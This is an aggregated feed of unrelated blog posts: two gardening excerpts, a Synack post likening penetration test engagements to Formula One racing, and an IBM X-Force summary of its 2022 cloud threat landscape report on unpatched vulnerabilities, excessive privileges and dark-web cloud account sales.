As winter approaches, it’s tempting just to sit back and put your feet up and not have to think about the garden until springtime. However, just a bit of extra work at this time of the year can save you a whole lot of hassle come planting time. Garden clean-up, the last big chore for gardeners, is often overlooked, especially […]

The post Winter Garden Clean Up appeared first on Backyard Gardener.

 Winter Ornamentals – Bark Book Excerpt by Dan Hinkley Like the last and messy hours of a party gone on too long, the soggy, cool days of late autumn cast about the garden a mood of the season’s demise. Yet as the last colored leaves, varnished with the first rains of winter, fall earthward, the deciduous trees bare their sinewy […]

The post Winter Ornamentals – Bark appeared first on Backyard Gardener.

Penetration Testing and Formula One Racing – Preparation is Key

By Nathan Jones Director, Customer Success, Synack

In Formula One, the most prepared teams have the best chances of success. Yet, preparation alone isn’t going to clinch a victory. Many factors contribute to crossing the finish line first: track conditions, weather, car setup, strategy changes and updates, as well as driver skill and decision making.

Penetration testing isn’t any different.

Following all the best practices and preparations laid out in our previous blog about getting ready for pentests like a Formula One champ is key, but you can’t truly succeed without smooth execution and deft management throughout the test.

At Synack, we’ve got you covered throughout the entire engagement on our Crowdsourced Penetration Testing Platform before and after our trusted network of security researchers go to work hunting for your vulnerabilities. 

Here’s what to expect throughout the Synack engagement:

• It starts with high-quality, trusted researchers

Your pit team: Researchers’ skills are critically important to the success of any pentest. Because the vulnerability landscape is so broad and diverse, a single researcher — or even a small number of researchers — won’t have expertise across all vulnerability categories to fully test the assets in question. 

That’s the value of the Synack crowdsourced testing platform because we attract the best researchers with a wide variety of skills and backgrounds. This allows large numbers of researchers to bring their experience to bear across the range of vulnerability categories, enabling the most thorough test of the assets in scope.

• Results get collected in a well-designed platform

Right car, right tools: A top-quality vulnerability management platform should underpin any pentest initiative, allowing customers to manage the full vulnerability lifecycle from initial reports, to analyst review, and then onto remediation. At Synack, the customer portal lets your team view vulnerabilities flow through a logical, easy-to-use workflow from discovery to patch to patch verification. 

In addition, our triage process ensures that vulnerability findings passed to the customer are valid, reproducible, high quality and actionable. This allows the customer to focus efforts on understanding the issues and taking appropriate action, saving considerable time and effort.

• Control the testing environment and parameters

Know the course: Some penetration tests can be intrusive and noisy. The Synack experience has been designed to make the process as simple and seamless as possible. It is carried out in a controlled manner to mitigate any sort of impact to client’s everyday business operations. Researchers work from a known source IP to ensure proper monitoring. Customers are encouraged to monitor activity and traffic during the test but we recommend waiting for a formal vulnerability report before any patching. Patching during a test limits researchers’ ability to validate the finding and reward the researcher. 

• Engage with researchers before and after the test

Connected to the pit crew: A testing engagement should not be a fire-and-forget activity. Customers should be looking to provide regular feedback, including information about new releases or changes, areas of scope on which researchers should focus and updates on any customer actions. 

Scope changes are a critical area of communication. A class of vulnerabilities caused by the same underlying issue should be temporarily removed from scope to prevent inundating the client with repetitive findings. We do this at Synack because it reduces noise as well as shifts the focus of researchers to other areas, thus ensuring better coverage.

• Augment manual testing with smart automation

Change out the equipment when needed: Penetration testing harnesses human creativity to create value, but automated scanners are an important tool, as well, to help augment human efforts. Too often, however, security teams have had to accept trade offs, investing in cheap self-service scanning solutions to get broad attack surface coverage. There’s a better way. Smarter technologies built on machine learning principles can make a difference and help scale the testing effort. At Synack, SmartScan®, our vulnerability assessment solution, enables, rather than burdens, security teams by scaling security testing and accelerating their vulnerability remediation processes. SmartScan® combines industry-best scanning technology, proprietary risk identification technology, and a crowd of the world’s best security researchers, the Synack Red Team (SRT) for noiseless scanning and high-quality triage.

• Recognize the possibility of unintended consequences 

Expect the unexpected: Every pentester and testing company seeks to avoid unwanted impact to the customer. Most issues can be avoided by having an accurate scope and researcher guidelines agreed ahead of testing. On the rare occasion that there is an incident, we have a process in place to deal with it immediately.  

• Act on the results

Celebrate your wins, learn from your mistakes: It’s essential that clients act on findings. Just discovering vulnerabilities does not improve an organization’s risk posture. The vulnerabilities should be patched and remediated as soon as possible. Clients should look to monitor and track their risk posture over time using a risk metric such as Synack’s Attacker Resistance Score to chart improvements. 

For long-term testing engagements, clients should not wait until the pentest has completed, but should fix issues and receive confirmation from the pentester that the mitigation was successful throughout the test. 

Verifying compliance with necessary regulations is also a key part of using the results of a penetration test. Synack strongly recommends that clients opt for a testing package that includes checking compliance, including either relevant OWASP categories, PCI DSS 11.3, and NIST SP 800-53. A testing checklist provides auditable documentation for compliance-driven penetration testing requirements.

• Keep on testing 

Always winning: In Formula One, when the race ends, the work isn’t’ over. There are always more races to run and further developments and improvements to make to stay ahead of the pack. 

The same is true in pentesting. As adversaries get more advanced, staying one step ahead in their cybersecurity is more important than ever. Regular pentesting is a key component of this. A client is only as strong as their weakest link, making appropriate pentesting against their entire attack surface critical to remaining cyber secure.

Winning looks like an overall reduction in vulnerability risk. While it’s impossible to eliminate all vulnerabilities, a healthy pentesting cadence will strengthen your security posture over time.

Nathan Jones is Director of Client Operations at Synack. He’s also a huge racing fan.

The post Race Day: Making the Most of Your Penetration Test appeared first on Synack.

While cloud computing and its many forms (private, public, hybrid cloud or multi-cloud environments) have become ubiquitous with innovation and growth over the past decade, cybercriminals have closely watched the migration and introduced innovations of their own to exploit the platforms. Most of these exploits are based on poor configurations and human error. New IBM Security X-Force data reveals that many cloud-adopting businesses are falling behind on basic security best practices, introducing more risk to their organizations.

Shedding light on the “cracked doors” that cybercriminals are using to compromise cloud environments, the 2022 X-Force Cloud Threat Landscape Report uncovers that vulnerability exploitation, a tried-and-true infection method, remains the most common way to achieve cloud compromise. Gathering insights from X-Force Threat Intelligence data, hundreds of X-Force Red penetration tests, X-Force Incident Response (IR) engagements and data provided by report contributor Intezer, between July 2021 and June 2022, some of the key highlights stemming from the report include:

• Cloud Vulnerabilities are on the Rise — Amid a sixfold increase in new cloud vulnerabilities over the past six years, 26% of cloud compromises that X-Force responded to were caused by attackers exploiting unpatched vulnerabilities, becoming the most common entry point observed. 

• More Access, More Problems — In 99% of pentesting engagements, X-Force Red was able to compromise client cloud environments through users’ excess privileges and permissions. This type of access could allow attackers to pivot and move laterally across a victim environment, increasing the level of impact in the event of an attack.

• Cloud Account Sales Gain Grounds in Dark Web Marketplaces — X-Force observed a 200% increase in cloud accounts now being advertised on the dark web, with remote desktop protocol and compromised credentials being the most popular cloud account sales making rounds on illicit marketplaces.

Unpatched Software: #1 Cause of Cloud Compromise

As the rise of IoT devices drives more and more connections to cloud environments, the larger the potential attack surface becomes introducing critical challenges that many businesses are experiencing like proper vulnerability management. Case in point — the report found that more than a quarter of studied cloud incidents were caused due to known, unpatched vulnerabilities being exploited. While the Log4j vulnerability and a vulnerability in VMware Cloud Director were two of the more commonly leveraged vulnerabilities observed in X-Force engagements, most vulnerabilities observed that were exploited primarily affected the on-premises version of applications, sparing the cloud instances.

As suspected, cloud-related vulnerabilities are increasing at a steady rate, with X-Force observing a 28% rise in new cloud vulnerabilities over the last year alone. With over 3,200 cloud-related vulnerabilities disclosed in total to date, businesses face an uphill battle when it comes to keeping up with the need to update and patch an increasing volume of vulnerable software. In addition to the growing number of cloud-related vulnerabilities, their severity is also rising, made apparent by the uptick in vulnerabilities capable of providing attackers with access to more sensitive and critical data as well as opportunities to carry out more damaging attacks.

These ongoing challenges point to the need for businesses to pressure test their environments and not only identify weaknesses in their environment, like unpatched, exploitable vulnerabilities, but prioritize them based on their severity, to ensure the most efficient risk mitigation.

Excessive Cloud Privileges Aid in Bad Actors’ Lateral Movement

The report also shines a light on another worrisome trend across cloud environments — poor access controls, with 99% of pentesting engagements that X-Force Red conducted succeeding due to users’ excess privileges and permissions. Businesses are allowing users unnecessary levels of access to various applications across their networks, inadvertently creating a stepping stone for attackers to gain a deeper foothold into the victim’s cloud environment.

The trend underlines the need for businesses to shift to zero trust strategies, further mitigating the risk that overly trusting user behaviors introduce. Zero trust strategies enable businesses to put in place appropriate policies and controls to scrutinize connections to the network, whether an application or a user, and iteratively verify their legitimacy. In addition, as organizations evolve their business models to innovate at speed and adapt with ease, it’s essential that they’re properly securing their hybrid, multi-cloud environments. Central to this is modernizing their architectures: not all data requires the same level of control and oversight, so determining the right workloads, to put in the right place for the right reason is important. Not only can this help businesses effectively manage their data, but it enables them to place efficient security controls around it, supported by proper security technologies and resources.

Dark Web Marketplaces Lean Heavier into Cloud Account Sales

With the rise of the cloud comes the rise of cloud accounts being sold on the Dark Web, verified by X-Force observing a 200% rise in the last year alone. Specifically, X-Force identified over 100,000 cloud account ads across Dark Web marketplaces, with some account types being more popular than others. Seventy-six percent of cloud account sales identified were Remote Desktop Protocol (RDP) access accounts, a slight uptick from the year prior. Compromised cloud credentials were also up for sale, accounting for 19% of cloud accounts advertised in the marketplaces X-Force analyzed.

The going price for this type of access is significantly low making these accounts easily attainable to the average bidder. The price for RDP access and compromised credentials average $7.98 and $11.74 respectively. Compromised credentials’ 47% higher selling price is likely due to their ease of use, as well as the fact that postings advertising credentials often include multiple sets of login data, potentially from other services that were stolen along with the cloud credentials, yielding a higher ROI for cybercriminals.

As more compromised cloud accounts pop up across these illicit marketplaces for malicious actors to exploit, it’s important that organizations work toward enforcing more stringent password policies by urging users to regularly update their passwords, as well as implement multifactor authentication (MFA). Businesses should also be leveraging Identity and Access Management tools to reduce reliance on username and password combinations and combat threat actor credential theft.

To read our comprehensive findings and learn about detailed actions organizations can take to protect their cloud environments, review our 2022 X-Force Cloud Security Threat Landscape here.

If you’re interested in signing up for the “Step Inside a Cloud Breach: Threat Intelligence and Best Practices” webinar on Wednesday, September 21, 2022, at 11:00 a.m. ET you can register here.

If you’d like to schedule a consult with IBM Security X-Force visit: www.ibm.com/security/xforce?schedulerform

The post Old Habits Die Hard: New Report Finds Businesses Still Introducing Security Risk into Cloud Environments appeared first on Security Intelligence.